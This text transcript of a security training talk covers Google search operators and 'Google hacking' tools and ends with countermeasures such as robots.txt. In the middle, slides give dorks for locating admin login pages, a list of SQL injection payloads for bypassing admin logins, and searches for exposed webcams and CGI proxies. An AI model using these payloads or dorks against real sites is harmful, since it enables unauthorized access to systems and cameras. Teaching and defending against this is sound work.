Document 7363325

Download Report

Transcript Document 7363325

Google and Beyond:
Advanced Search Engine Hacking
and Web-Based Intelligence
Gathering
By
Manish Kumar
Founder & CEO,
Rooman Technologies Pvt Ltd
AGENDA
• How Google works
• Information disclosure with Google
• Tools
• Countermeasures
Google Hacking
Web Hacking:
Pick a site, find the vulnerability
Google Hacking :
Pick a vulnerability, find the site.
Don’t Be A Target of Opportunity
How Google Works
• Googlebot,
– a web crawler that finds and
fetches web pages.
• The indexer
– that sorts every word on
every page and stores the
resulting index of words in a
huge database.
• The query processor
– which compares your search
query to the index and
recommends the documents
that it considers most
relevant.
How Google Works
SERVER SIDE
CLIENT SIDE
How Googlebot Works
Googlebot finds pages in
two ways
– through an add URL
form,
www.google.com/addurl.html
– through finding links by
crawling the web.
Indexer and Query Processor
• Indexer
– Googlebot gives the
indexer the full text of
the pages it finds. These
pages are stored in
Google’s index database
in alphabetic order.
– each index entry store a
list of documents in
which the term appears
and the location within
the text where it occurs.
• Query Processor
– Page Ranking puts more
important pages at high
rank.
– Intelligent Technique for
learning relationships
and associations within
the stored data
– Spelling Correcting
System
So What Determines Page
Relevance and Rating?
• Exact Phrase:
– are your keywords found as an exact phrase in any
pages?
• Adjacency:
– how close are your keywords to each other?
• Weighting:
– how many times do the keywords appear in the page?
• PageRank/Links:
– How many links point to the page? How many links are
actually in the page.
Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links)
The Basics
• To set the stage for what I will demo, it is
necessary to understand some of Google’s
advanced search functions.
• This will not be an exhaustive list, just an intro.
• Creative use of these functions is the key to
successful Google Hacking.
The Basics
• Some important things to keep in mind
– Google queries are not case sensitive.
– The * wildcard represents any word
• Example: “* insurance quote”
– Google stems words automatically
• Example: “automobile insurance quote” brings up sites
with “auto … “.
The Basics
• The + symbol forces inclusion of a certain
word.
– “auto insurance +progressive”
• The - symbol forces exclusion of a certain
word.
– (Site:progressive.com –site:www.progressive.com)
• The | symbol provides boolean OR logic.
– “auto insurance + inurl:(progressive | geico)”
Information Disclosure with Google
• Advanced Search Operators
– site: (.edu, .gov, foundstone.com, usc.edu)
– filetype: (txt, xls, mdb, pdf, .log)
– Daterange: (julian date format)
– Intitle / allintitle
– Inurl / allinurl
Advanced Operators
• link:URL = lists other pages that link to the URL.
• related:URL = lists other pages that are related to the URL.
• site:domain.com “search term” = restricts search results to
the given domain.
• allinurl:WORDS = shows only pages with all search terms in the url.
• inurl:WORD = like allinurl: but filters the URL based on the first
term only.
• allintitle:WORD = shows only results with terms in title.
• intitle:WORD = similar to allintitle, but only for the next word.
• cache:URL = will show the Google cached version of the URL.
The Basics
• Let’s take a look at a few of the interesting
Google search commands.
The Basics
• There are many more advanced operators.
• Combining these creatively is the key to
Google Hacking.
• http://www.googleguide.com/advanced_oper
ators_reference.html
BUT DO YOU REALLY NEED TO REMEMBER IT
Advanced Search with Google
INTERESTING SEARCHES…
Now that we’ve gotten this boring
stuff out of the way, let’s introduce
some Google hacks.
Google and Proxy
• Use www.google.com/translate_t to by-pass
Internet Browser Security Settings.
• Find a proxy that works, and enter in the URL
– inurl:”nph-proxy.cgi” “start using cgiproxy”
– inurl:”nph-proxy.cgi” “Start browsing through this
CGI-based proxy”
Gaining auth bypass on an admin
account
• There is a large number of google dork for
basic sql injection
–
–
–
–
–
–
–
–
–
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
SQL Injection
Keep the username as "Admin“ and for password type one of
the following
•
•
•
•
•
•
•
•
•
•
•
•
' or '1'='1
' or 'x'='x
' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
•
•
•
•
•
•
•
•
•
•
•
" or 1=1-or 1=1-' or a=a-" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 -hi' or 1=1 –
blah’
'or'1=1'
Few more interesting Searches
• Browsing images of the site
– Site: xxxxxxx in Google image
• Browse Live Video Cameras
– inurl:”viewerframe?mode=motion”
(http://202.212.193.26:555/ViewerFrame?Mode=Motion&Language=0)
– Intitle:”Live View / - AXIS”
• Browse Open Webcams Worldwide
– Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml
– Cannon Webcams: sample/LvAppl/
• Server versioning
– intitle:index.of “server at”
Tools
– Google Hacks
– Goolag Site Scanner
– Site Digger
– Gooscan
– Goolink Scanner
– Athena
GOOGLE HACK
• Google Hacks is a compilation of carefully
crafted Google searches that expose novel
functionality from Google's search and map
services
• You can use it to view a timeline of your
search results, view a map, search for music,
search for books, and perform many other
specific kinds of searches
• You can also use this program to use google as
a proxy
GOOGLE HACK SCREEN SHOT
GOOLAG SCANNER
• Goolag Scanner enables everyone to audit
his/her own web site via Google
• It uses one xml-based configuration file for its
settings
Screenshot of GOOLAG SCANNER
SITEDIGGER
• Automated Google hacking tool from
Foundstone
• Uses Google API
• Uses Google Hacking Database
• SiteDigger searches Google’s cache to look for
vulnerabilities, errors, configuration issues,
proprietary information, and interesting
security nuggets on websites
Screen shot of SITE DIGGER
Countermeasures
•
•
•
•
•
Keep sensitive data off the web!!
Do not display detailed Error Message
Do not allow Directory Browsing
Perform periodic Google Assessments
Update robots.txt (For examples and suggestions
for using a robots.txt file, see http://www.robotstxt.org)
• Use meta-tags: NOARCHIVE
• http://www.google.com/remove.html.
This is bad!
How To Protect Your Websites From
Google Hackers
• Use a robots.txt file to prevent Google and
other search engines from crawling your site if
it shouldn’t be crawled.
ROBOTS.TXT Example
• This example allows all robots to visit all files because the
wildcard "*" specifies all robots:
– User-agent: *
– Disallow:
• This example keeps all robots out:
– User-agent: *
– Disallow: /
• The next is an example that tells all crawlers not to enter four
directories of a website:
– User-agent: *
– Disallow: /cgi-bin/ Disallow: /images/ Disallow: /tmp/
Disallow: /private/
Robots.txt Cont..
• Example that tells a specific crawler not to enter one specific
directory:
– User-agent: BadBot # replace the 'BadBot' with the actual user-agent
of the bot
– Disallow: /private/
• Example that tells all crawlers not to enter one specific file:
– User-agent: *
– Disallow: /directory/file.html
• Note that all other files in the specified directory will be
processed.
• Example demonstrating how comments can be used:
– # Comments appear after the "#" symbol at the start of a line, or after
a directive User-agent: * # match all bots Disallow: / # keep them out
Few interesting Websites
• www.archive.org
– Archive of websites (Time Machine)
• www.readnotify.com
– Find out when your email gets read, Retract,
Certify, Track & much more
• www.guerrillamail.com
– (provides you with disposable e-mail addresses
which expire after 15 Minutes.
• www.gorillaemail.com
– Email Marketing solutions that allows you to Send, Track
and Confirm delivery of Emails, Newsletters, Events etc.
QUESTIONS ????
THANK YOU
Manish Kumar,
CEO, Rooman Technologies
Email: [email protected]
Ph: 080-40445566